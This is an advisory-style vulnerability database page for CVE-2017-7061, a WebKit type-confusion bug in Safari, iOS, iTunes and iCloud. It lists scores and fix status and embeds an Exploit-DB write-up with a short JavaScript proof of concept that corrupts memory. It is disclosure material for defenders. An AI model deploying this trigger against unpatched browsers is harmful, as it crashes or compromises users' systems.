CVE-2017-7061

high

Published 2017-07-20 · Modified 2026-05-13

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

8.8

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS v4 NEW

—

not yet in upstream

VIR risk

9.8

Description

An issue was discovered in certain Apple products. iOS before 10.3.3 is affected. Safari before 10.1.2 is affected. iCloud before 6.2.2 on Windows is affected. iTunes before 12.6.2 on Windows is affected. tvOS before 10.2.2 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.

Predictions

Exploit likelihood

100%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-42666 dos multiple verified text · 3 KB

Google Security Research · 2017-09-12

WebKit JSC - 'BytecodeGenerator::emitGetByVal' Incorrect Optimization (1)

text exploit Source: Exploit-DB

Let's start with JS code.

let o = {};
for (let i in {xx: 0}) {
    o[i]; <<-------- (a)
}

When the code generator meets (a), it will call BytecodeGenerator::emitGetByVal.

Here's the code of BytecodeGenerator::emitGetByVal.

RegisterID* BytecodeGenerator::emitGetByVal(RegisterID* dst, RegisterID* base, RegisterID* property)
{
    for (size_t i = m_forInContextStack.size(); i > 0; i--) {
        ForInContext& context = m_forInContextStack[i - 1].get();
        if (context.local() != property)
            continue;

        if (!context.isValid())
            break;

        if (context.type() == ForInContext::IndexedForInContextType) {
            property = static_cast<IndexedForInContext&>(context).index();
            break;
        }

        ASSERT(context.type() == ForInContext::StructureForInContextType);
        StructureForInContext& structureContext = static_cast<StructureForInContext&>(context);
        UnlinkedValueProfile profile = emitProfiledOpcode(op_get_direct_pname);
        instructions().append(kill(dst));
        instructions().append(base->index());
        instructions().append(property->index());
        instructions().append(structureContext.index()->index());
        instructions().append(structureContext.enumerator()->index());
        instructions().append(profile);
        return dst;
    }

    UnlinkedArrayProfile arrayProfile = newArrayProfile();
    UnlinkedValueProfile profile = emitProfiledOpcode(op_get_by_val);
    instructions().append(kill(dst));
    instructions().append(base->index());
    instructions().append(property->index());
    instructions().append(arrayProfile);
    instructions().append(profile);
    return dst;
}

The method uses op_get_by_val to handle expressions like "o[i]". But, there is a fast path, which uses op_get_direct_pname, for when the index variable is a string. op_get_direct_pname is designed for a string index only. So if other types are used as indexes, it will cause type confusions. In the above JS code, it's very clear that "i" will be a string("xx") semantically. Therefore, it will use op_get_direct_pname to handle it.

Here's another example.

let o = {};
for (let i in {xx: 0}) {
    o[i]; <<-------- (a)
    i = 0x123456; <<-------- (b)
    o[i]; <<-------- (c)
}

In this case, it will use op_get_direct_pname at (a). And at (b), since the index variable "i" is replaced, the invalidate method of the ForInContext object that makes "context.isValid()" return false is called. So, op_get_by_val will be used at (c).

But the problem is that it can't properly handle the following case which cause a type confusion.

let o = {};
for (let i in {xx: 0}) {
    for (let j = 0; j < 2; j++) {
        o[i];  // When j == 1, op_get_direct_pname was already emitted, but i is not a string anymore.
        i = 0;
    }
}

PoC:
let o = {};
for (let i in {xx: 0}) {
    for (let j = 0; j < 2; j++) {
        o[i];
        i = new Uint32Array([0, 1, 0x777777, 0, 0]);
    }
}

OS impact

macOS Affected 1 release

Version	Status	Fixed in
—	Affected	`10.3.3`

SUSE Affected 1 release

Version	Status	Fixed in
—	Affected	—

Debian Fixed 5 releases

Version	Status	Fixed in
trixie	Fixed	`2.16.6-1`
sid	Fixed	`2.16.6-1`
forky	Fixed	`2.16.6-1`
bullseye	Fixed	`2.16.6-1`
bookworm	Fixed	`2.16.6-1`

Application impact

Vendor	Product	Versions	Fixed
apple	safari	`{"endExcluding":"10.1.2"}`	`10.1.2`
apple	icloud	`{"endExcluding":"6.2.2"}`	`6.2.2`
apple	itunes	`{"endExcluding":"12.6.2"}`	`12.6.2`
apple	webkit	`-`

References

CWEs

CWE-119

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.